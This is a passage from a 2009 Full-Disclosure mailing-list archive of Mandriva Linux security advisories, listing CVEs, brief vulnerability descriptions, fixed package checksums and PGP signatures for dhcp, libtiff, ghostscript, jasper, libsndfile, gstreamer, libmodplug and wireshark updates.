 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455
 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and
 ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528;
 allows remote attackers to cause a denial of service (daemon crash)
 or execute arbitrary code via a malformed DHCP packet with a large
 dhcp-max-message-size that triggers a stack-based buffer overflow,
 related to servers configured to send many DHCP options to clients
 (CVE-2007-0062).
 
 Stack-based buffer overflow in the script_write_params method in
 client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0
 before 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP
 servers to execute arbitrary code via a crafted subnet-mask option
 (CVE-2009-0692).
 
 ISC DHCP Server is vulnerable to a denial of service, caused by the
 improper handling of DHCP requests. If the host definitions are mixed
 using dhcp-client-identifier and hardware ethernet, a remote attacker
 could send specially-crafted DHCP requests to cause the server to
 stop responding (CVE-2009-1892).
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 This update provides fixes for this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 3081299715b66778098307681861d6d7  
2008.0/i586/dhcp-client-3.0.7-0.1mdv2008.0.i586.rpm
 65893c30e369cb54df581508c0a278ce  
2008.0/i586/dhcp-common-3.0.7-0.1mdv2008.0.i586.rpm
 c7891651d44f4c66967789a594cb494f  
2008.0/i586/dhcp-devel-3.0.7-0.1mdv2008.0.i586.rpm
 6ddeab5add9a44c4c0d97fc98e98b48f  
2008.0/i586/dhcp-doc-3.0.7-0.1mdv2008.0.i586.rpm
 2c3e9e31d4c99a3622ce4c029ce7d5f9  
2008.0/i586/dhcp-relay-3.0.7-0.1mdv2008.0.i586.rpm
 e9271dcc129000708f9537a5ad3a926f  
2008.0/i586/dhcp-server-3.0.7-0.1mdv2008.0.i586.rpm 
 2a2e6cca8ab0d7c62e14aa19116ac860  2008.0/SRPMS/dhcp-3.0.7-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 137eaf194b2faa3a8de3b90453c47793  
2008.0/x86_64/dhcp-client-3.0.7-0.1mdv2008.0.x86_64.rpm
 79a273d98b5ef2f51c93c0f4d49ab82a  
2008.0/x86_64/dhcp-common-3.0.7-0.1mdv2008.0.x86_64.rpm
 4e1ca48b749ef04f4aff6dd6d9d34bde  
2008.0/x86_64/dhcp-devel-3.0.7-0.1mdv2008.0.x86_64.rpm
 df97bbd0680f5b82417be5fb448a3493  
2008.0/x86_64/dhcp-doc-3.0.7-0.1mdv2008.0.x86_64.rpm
 daa25b01f8fd36dc2cb4c0e2c119  
2008.0/x86_64/dhcp-relay-3.0.7-0.1mdv2008.0.x86_64.rpm
 1d283afe24bb93f3c155a2b762e50988  
2008.0/x86_64/dhcp-server-3.0.7-0.1mdv2008.0.x86_64.rpm 
 2a2e6cca8ab0d7c62e14aa19116ac860  2008.0/SRPMS/dhcp-3.0.7-0.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGDHfmqjQ0CJFipgRAhxkAJ9Hi8PHKRM/bBVsFI7ZX1xpSrfcBACfS+L+
jLmws+7KhLHXB/1Rh2rDXXw=
=QOvE
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:169-1 ] libtiff

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:169-1
 http://www.mandriva.com/security/
 ___

 Package : libtiff
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in libtiff:
 
 Buffer underflow in the LZWDecodeCompat function in libtiff 3.8.2
 allows context-dependent attackers to cause a denial of service (crash)
 via a crafted TIFF image, a different vulnerability than CVE-2008-2327
 (CVE-2009-2285).
 
 Fix several places in tiff2rgba and rgb2ycbcr that were being careless
 about possible integer overflow in calculation of buffer sizes
 (CVE-2009-2347).
 
 This update provides fixes for these vulnerabilities.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2285
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2347
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 6942dec4f625c5ca859cbf2c35445d19  
2008.0/i586/libtiff3-3.8.2-8.2mdv2008.0.i586.rpm
 693b50058e610310fe22274ebcbd4a5e  
2008.0/i586/libtiff3-devel-3.8.2-8.2mdv2008.0.i586.rpm
 63c42fbe6a60eb5c5c0614d1b1ca6495  
2008.0/i586/libtiff3-static-devel-3.8.2-8.2mdv2008.0.i586.rpm
 cf3bbc57b9eade53f75dfc5b28de96c6  
2008.0/i586/libtiff-progs-3.8.2-8.2mdv2008.0.i586.rpm 
 dd7d7876d10944c42ca76e8c71eb4c35  
2008.0/SRPMS/libtiff-3.8.2-8.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 b4c14d385a14e9dbca6ccf1c37cdf1a4  
2008.0/x86_64/lib64tiff3-3.8.2-8.2mdv2008.0.x86_64.rpm
 97329de609ab88d18dccee7631825466  
2008.0/x86_64/lib64tiff3-devel-3.8.2-8.2mdv2008.0.x86_64.rpm
 0740aa57941c1b9413b463ef7267138d  
2008.0/x86_64/lib64tiff3-static-devel-3.8.2-8.2mdv2008.0.x86_64.rpm
 8f5619fd9995c58d83cf5c6b44576452  
2008.0/x86_64/libtiff-progs-3.8.2-8.2mdv2008.0.x86_64.rpm 
 dd7d7876d10944c42ca76e8c71eb4c35  
2008.0/SRPMS/libtiff-3.8.2-8.2mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGC72mqjQ0CJFipgRAhgOAKDRVYDM0o1NDwx9HxlfFvvmB5PhtACgrvjc
Eep0TsrNlfZSsSDV2xRDFXI=
=2vwj
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:311 ] ghostscript

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:311
 http://www.mandriva.com/security/
 ___

 Package : ghostscript
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple security vulnerabilities has been identified and fixed
 in ghostscript:
 
 A buffer underflow in Ghostscript's CCITTFax decoding filter allows
 remote attackers to cause denial of service and possibly to execute
 arbitrary by using a crafted PDF file (CVE-2007-6725).
 
 Buffer overflow in Ghostscript's BaseFont writer module allows
 remote attackers to cause a denial of service and possibly to execute
 arbitrary code via a crafted Postscript file (CVE-2008-6679).
 
 Multiple interger overflows in Ghostsript's International Color
 Consortium Format Library (icclib) allows attackers to cause denial
 of service (heap-based buffer overflow and application crash) and
 possibly execute arbirary code by using either a PostScript or PDF
 file with crafte embedded images (CVE-2009-0583, CVE-2009-0584).
 
 Multiple interger overflows in Ghostsript's International Color
 Consortium Format Library (icclib) allows attackers to cause denial
 of service (heap-based buffer overflow and application crash) and
 possibly execute arbirary code by using either a PostScript or PDF
 file with crafte embedded images. Note: this issue exists because of
 an incomplete fix for CVE-2009-0583 (CVE-2009-0792).
 
 Heap-based overflow in Ghostscript's JBIG2 decoding library allows
 attackers to cause denial of service and possibly to execute arbitrary
 code by using a crafted PDF file (CVE-2009-0196).
 
 Multiple integer overflows in JasPer 1.900.1 might allow
 context-dependent attackers to have an unknown impact via a crafted
 image file, related to integer multiplication for memory allocation
 (CVE-2008-3520).
 
 Buffer overflow in the jas_stream_printf function in
 libjasper/base/jas_stream.c in JasPer 1.900.1 might allow
 context-dependent attackers to have an unknown impact via
 vectors related to the mif_hdr_put function and use of vsprintf
 (CVE-2008-3522).
 
 Previousely the ghostscript packages were statically built against
 a bundled and private copy of the jasper library. This update makes
 ghostscript link against the shared system jasper library which
 makes it easier to address presumptive future security issues in the
 jasper library.
 
 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 
 This update provides fixes for that vulnerabilities.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6725
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3520
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3522
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6679
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0196
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0583
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0584
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0792
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 d419c4cc3452b90b350c8fda68bf29f8  
2008.0/i586/ghostscript-8.60-55.3mdv2008.0.i586.rpm
 7e120e4166ebbf8203a05d657223c5d5  
2008.0/i586/ghostscript-common-8.60-55.3mdv2008.0.i586.rpm
 29685fcf8eb0bb04d59e07fcbb57973f  
2008.0/i586/ghostscript-doc-8.60-55.3mdv2008.0.i586.rpm
 d205693e3d3ba8da5f9197992d28ed13  
2008.0/i586/ghostscript-dvipdf-8.60-55.3mdv2008.0.i586.rpm
 6b4c9b0bcb0e00dfadf1e4d145a4c657  
2008.0/i586/ghostscript-module-X-8.60-55.3mdv2008.0.i586.rpm
 04b75844bec6d20e8d642ad0c217ad1f  
2008.0/i586/ghostscript-X-8.60-55.3mdv2008.0.i586.rpm
 b20ee4fa316e601a73131d0cca1b1643  
2008.0/i586/libgs8-8.60-55.3mdv2008.0.i586.rpm
 121aea93ce9d622fb7d5f616e442bc86  
2008.0/i586/libgs8-devel-8.60-55.3mdv2008.0.i586.rpm
 157190bd96bc7326ce9291a67db738cf  
2008.0/i586/libijs1-0.35-55.3mdv2008.0.i586.rpm
 50d401f2135225ec3cad3881ceb084bd  
2008.0/i586/libijs1-devel-0.35-55.3mdv2008.0.i586.rpm 
 5f649dc370d0b581b067d8b5db30a1a2  
2008.0/SRPMS/ghostscript-8.60-55.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 54292241ec99616cedd3099e4d2ff6a5  
2008.0/x86_64/ghostscript-8.60-55.3mdv2008.0.x86_64.rpm
 ede49cf300d10edf9b67067c13608fd2  
2008.0/x86_64/ghostscript-common-8.60-55.3mdv2008.0.x86_64.rpm
 e75cb4fb3d2b00ff395da26109518f6b  
2008.0/x86_64/ghostscript-doc-8.60-55.3mdv2008.0.x86_64.rpm
 2644ccf83047b448e0d0097bab2dad19  
2008.0/x86_64/ghostscript-dvipdf-8.60-55.3mdv2008.0.x86_64.rpm
 eaf0ee1db669bf25c30839b2da7782d1  
2008.0/x86_64/ghostscript-module-X-8.60-55.3mdv2008.0.x86_64.rpm
 62ad0f8af

[Full-disclosure] [ MDVSA-2009:142-1 ] jasper

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:142-1
 http://www.mandriva.com/security/
 ___

 Package : jasper
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple security vulnerabilities has been identified and fixed
 in jasper:
 
 The jpc_qcx_getcompparms function in jpc/jpc_cs.c for the JasPer
 JPEG-2000 library (libjasper) before 1.900 allows remote user-assisted
 attackers to cause a denial of service (crash) and possibly corrupt
 the heap via malformed image files, as originally demonstrated using
 imagemagick convert (CVE-2007-2721).
 
 Multiple integer overflows in JasPer 1.900.1 might allow
 context-dependent attackers to have an unknown impact via a crafted
 image file, related to integer multiplication for memory allocation
 (CVE-2008-3520).
 
 The jas_stream_tmpfile function in libjasper/base/jas_stream.c in
 JasPer 1.900.1 allows local users to overwrite arbitrary files via
 a symlink attack on a tmp.XX temporary file (CVE-2008-3521).
 
 Buffer overflow in the jas_stream_printf function in
 libjasper/base/jas_stream.c in JasPer 1.900.1 might allow
 context-dependent attackers to have an unknown impact via
 vectors related to the mif_hdr_put function and use of vsprintf
 (CVE-2008-3522).
 
 The updated packages have been patched to prevent this.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2721
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3520
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3521
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3522
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 5f9c8dfae30f0cadf061de621b8c8001  
2008.0/i586/jasper-1.900.1-2.1mdv2008.0.i586.rpm
 31a18f0fd0eaf9fe8fbc3152716c5a97  
2008.0/i586/libjasper1-1.900.1-2.1mdv2008.0.i586.rpm
 c19c0a59243be390523cfeb26362e177  
2008.0/i586/libjasper1-devel-1.900.1-2.1mdv2008.0.i586.rpm
 88a5c06798169a312935e33918194286  
2008.0/i586/libjasper1-static-devel-1.900.1-2.1mdv2008.0.i586.rpm 
 16072736699b72d0d545a3b632fa0d70  
2008.0/SRPMS/jasper-1.900.1-2.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 387d1e14ef8069d239bff354726b26cb  
2008.0/x86_64/jasper-1.900.1-2.1mdv2008.0.x86_64.rpm
 2ab7bf2550e00e423b511b5921a103b3  
2008.0/x86_64/lib64jasper1-1.900.1-2.1mdv2008.0.x86_64.rpm
 5abd166c380e4ed1cc9b925b5d0f1845  
2008.0/x86_64/lib64jasper1-devel-1.900.1-2.1mdv2008.0.x86_64.rpm
 36e2d6ef0ceb0ffdfa88265a9b016173  
2008.0/x86_64/lib64jasper1-static-devel-1.900.1-2.1mdv2008.0.x86_64.rpm 
 16072736699b72d0d545a3b632fa0d70  
2008.0/SRPMS/jasper-1.900.1-2.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGBu5mqjQ0CJFipgRAnnxAKC1Yqp3matYvYtzco9NCLtW6KlsNgCgjIzw
PL7nkNJNn62nP+NYytohvZk=
=f+gJ
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:132-1 ] libsndfile

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:132-1
 http://www.mandriva.com/security/
 ___

 Package : libsndfile
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in libsndfile:
 
 Heap-based buffer overflow in voc_read_header in libsndfile 1.0.15
 through 1.0.19, as used in Winamp 5.552 and possibly other media
 programs, allows remote attackers to cause a denial of service
 (application crash) and possibly execute arbitrary code via a VOC
 file with an invalid header value (CVE-2009-1788).
 
 Heap-based buffer overflow in aiff_read_header in libsndfile 1.0.15
 through 1.0.19, as used in Winamp 5.552 and possibly other media
 programs, allows remote attackers to cause a denial of service
 (application crash) and possibly execute arbitrary code via an AIFF
 file with an invalid header value (CVE-2009-1791).
 
 This update provides fixes for these vulnerabilities.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1788
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1791
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 ea472db88b618bee93d7f3ab1f8ab9b4  
2008.0/i586/libsndfile1-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm
 3e7fb05e87d69989223f20c5a9aae811  
2008.0/i586/libsndfile-devel-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm
 9bce8a72068db657b5027c88bc256f37  
2008.0/i586/libsndfile-progs-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm
 270c48e98c2ce89f2449f0be3d9dbad1  
2008.0/i586/libsndfile-static-devel-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 
 2e269eb125174d1cbb2441a30f484408  
2008.0/SRPMS/libsndfile-1.0.18-0.pre20.0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 9b4bdc3d55214078d297ad89122c567f  
2008.0/x86_64/lib64sndfile1-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm
 f251a5402b23fce61b9e90e7db24aa29  
2008.0/x86_64/lib64sndfile-devel-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm
 f1a6a61239498b667ed594bddee1e00b  
2008.0/x86_64/lib64sndfile-static-devel-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm
 8525f4f8f5bb8455f86cc23abaa40612  
2008.0/x86_64/libsndfile-progs-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm 
 2e269eb125174d1cbb2441a30f484408  
2008.0/SRPMS/libsndfile-1.0.18-0.pre20.0.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGBSImqjQ0CJFipgRAjwlAJ9T5WH37B1T40fhxW1V5tj5XjmpiQCgiXdg
v+m6uh2k4UrY0KRwoGJ7Wc8=
=5Ogf
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:130-1 ] gstreamer0.10-plugins-good

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:130-1
 http://www.mandriva.com/security/
 ___

 Package : gstreamer0.10-plugins-good
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple integer overflows in the (1) user_info_callback,
 (2) user_endrow_callback, and (3) gst_pngdec_task functions
 (ext/libpng/gstpngdec.c) in GStreamer Good Plug-ins (aka
 gst-plugins-good or gstreamer-plugins-good) 0.10.15 allow remote
 attackers to cause a denial of service and possibly execute arbitrary
 code via a crafted PNG file, which triggers a buffer overflow
 (CVE-2009-1932).

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1932
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 df985dc0abc217067a7d663c411b4209  
2008.0/i586/gstreamer0.10-aalib-0.10.6-3.3mdv2008.0.i586.rpm
 c548713a6efd8d262876bf1ed9363fe5  
2008.0/i586/gstreamer0.10-caca-0.10.6-3.3mdv2008.0.i586.rpm
 97b895479d7e42ff11735889bb4c16ed  
2008.0/i586/gstreamer0.10-dv-0.10.6-3.3mdv2008.0.i586.rpm
 a63dccd47b65fe27b8f6319662633201  
2008.0/i586/gstreamer0.10-esound-0.10.6-3.3mdv2008.0.i586.rpm
 0903bef11230d673d2cebe6e6900b2bb  
2008.0/i586/gstreamer0.10-flac-0.10.6-3.3mdv2008.0.i586.rpm
 e80a3bb6ed87aef074c9066e063b85ee  
2008.0/i586/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.i586.rpm
 e3c9a6aac6da3d7b8d9a45b0b561cd86  
2008.0/i586/gstreamer0.10-raw1394-0.10.6-3.3mdv2008.0.i586.rpm
 08745e3b02ba9fdd66573e9e1f6db381  
2008.0/i586/gstreamer0.10-speex-0.10.6-3.3mdv2008.0.i586.rpm
 2bedca9a38fd4bca8879b1c947dedffa  
2008.0/i586/gstreamer0.10-wavpack-0.10.6-3.3mdv2008.0.i586.rpm 
 bce20d4accbb9500b91d7dfc7283802d  
2008.0/SRPMS/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 295a03de38ee7d2f94f8f7a072d4ef83  
2008.0/x86_64/gstreamer0.10-aalib-0.10.6-3.3mdv2008.0.x86_64.rpm
 1949357b44313e9342f9e0f064cfe921  
2008.0/x86_64/gstreamer0.10-caca-0.10.6-3.3mdv2008.0.x86_64.rpm
 5b1402d0fed2ab576ae4226a4aae72a4  
2008.0/x86_64/gstreamer0.10-dv-0.10.6-3.3mdv2008.0.x86_64.rpm
 22803eab821db27cca1c6362ae2a05d7  
2008.0/x86_64/gstreamer0.10-esound-0.10.6-3.3mdv2008.0.x86_64.rpm
 915d40526cdfc5bab5d54126f6a90f69  
2008.0/x86_64/gstreamer0.10-flac-0.10.6-3.3mdv2008.0.x86_64.rpm
 48f0e87f8105251ad7edd7553ae2060f  
2008.0/x86_64/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.x86_64.rpm
 93e82958bc9833629af16a21372b503d  
2008.0/x86_64/gstreamer0.10-raw1394-0.10.6-3.3mdv2008.0.x86_64.rpm
 936698fc48970cd422cd0fac330e5e99  
2008.0/x86_64/gstreamer0.10-speex-0.10.6-3.3mdv2008.0.x86_64.rpm
 1edc68a1a2e4248495df6435a4e38ac6  
2008.0/x86_64/gstreamer0.10-wavpack-0.10.6-3.3mdv2008.0.x86_64.rpm 
 bce20d4accbb9500b91d7dfc7283802d  
2008.0/SRPMS/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGBF8mqjQ0CJFipgRAlvjAJ9h9KnXtEP3oqwgaUvRERM7z8xEFQCdGHms
QZ0/5EhLrjKzxAm3OVrws2A=
=OIZm
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:128-1 ] libmodplug

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:128-1
 http://www.mandriva.com/security/
 ___

 Package : libmodplug
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Multiple security vulnerabilities has been identified and fixed
 in libmodplug:
 
 Integer overflow in the CSoundFile::ReadMed function (src/load_med.cpp)
 in libmodplug before 0.8.6, as used in gstreamer-plugins and other
 products, allows context-dependent attackers to execute arbitrary
 code via a MED file with a crafted (1) song comment or (2) song name,
 which triggers a heap-based buffer overflow (CVE-2009-1438).
 
 Buffer overflow in the PATinst function in src/load_pat.cpp in
 libmodplug before 0.8.7 allows user-assisted remote attackers to
 cause a denial of service and possibly execute arbitrary code via a
 long instrument name (CVE-2009-1513).
 
 The updated packages have been patched to prevent this.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1438
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1513
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 9d7e4ce45987f8103e6e68ff6a789afa  
2008.0/i586/libmodplug0-0.8.4-1.1mdv2008.0.i586.rpm
 65ca878fccad537bd0dcc8e7b6156d3a  
2008.0/i586/libmodplug0-devel-0.8.4-1.1mdv2008.0.i586.rpm 
 496719add48603cf87e3a27025b5dabb  
2008.0/SRPMS/libmodplug-0.8.4-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 4e456e05bc59c08a0a0adaf7a2ccce37  
2008.0/x86_64/lib64modplug0-0.8.4-1.1mdv2008.0.x86_64.rpm
 389e7edbacb029bcd9afef7cf4a9ba0e  
2008.0/x86_64/lib64modplug0-devel-0.8.4-1.1mdv2008.0.x86_64.rpm 
 496719add48603cf87e3a27025b5dabb  
2008.0/SRPMS/libmodplug-0.8.4-1.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLGAw1mqjQ0CJFipgRArw1AJ41+1ZC03JlLV0BIC9hVLI4w/SjWACgyafO
xS9rR8i92aZtwqzfYVcDqsA=
=eXl+
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:292-1 ] wireshark

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:292-1
 http://www.mandriva.com/security/
 ___

 Package : wireshark
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Vulnerabilities have been discovered and corrected in wireshark,
 affecting DCERPC/NT dissector, which allows remote attackers to cause
 a denial of service (NULL pointer dereference and application crash)
 via a file that records a malformed packet trace (CVE-2009-3550); and
 in wiretap/erf.c which allows remote attackers to execute arbitrary
 code or cause a denial of service (application crash) via a crafted
 erf file (CVE-2009-3829).
 
 The wireshark package has been updated to fix these vulnerabilities.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3550
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3829
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 8b075be8db6b26deba7933a925b12f5d  
2008.0/i586/dumpcap-1.0.10-0.1mdv2008.0.i586.rpm
 3477bcc8d3e2257489b4ae8573f5f8d0  
2008.0/i586/libwireshark0-1.0.10-0.1mdv2008.0.i586.rpm
 451163f6f02baa7c1eb48fab26e8adfa  
2008.0/i586/libwireshark-devel-1.0.10-0.1mdv2008.0.i586.rpm
 b457625c43f2d605e18e6537b958f0b7  
2008.0/i586/rawshark-1.0.10-0.1mdv2008.0.i586.rpm
 1ffce24777b986cccd506aee471a14e9  
2008.0/i586/tshark-1.0.10-0.1mdv2008.0.i586.rpm
 18467254cc21a36f25e0ac47013c90b5  
2008.0/i586/wireshark-1.0.10-0.1mdv2008.0.i586.rpm
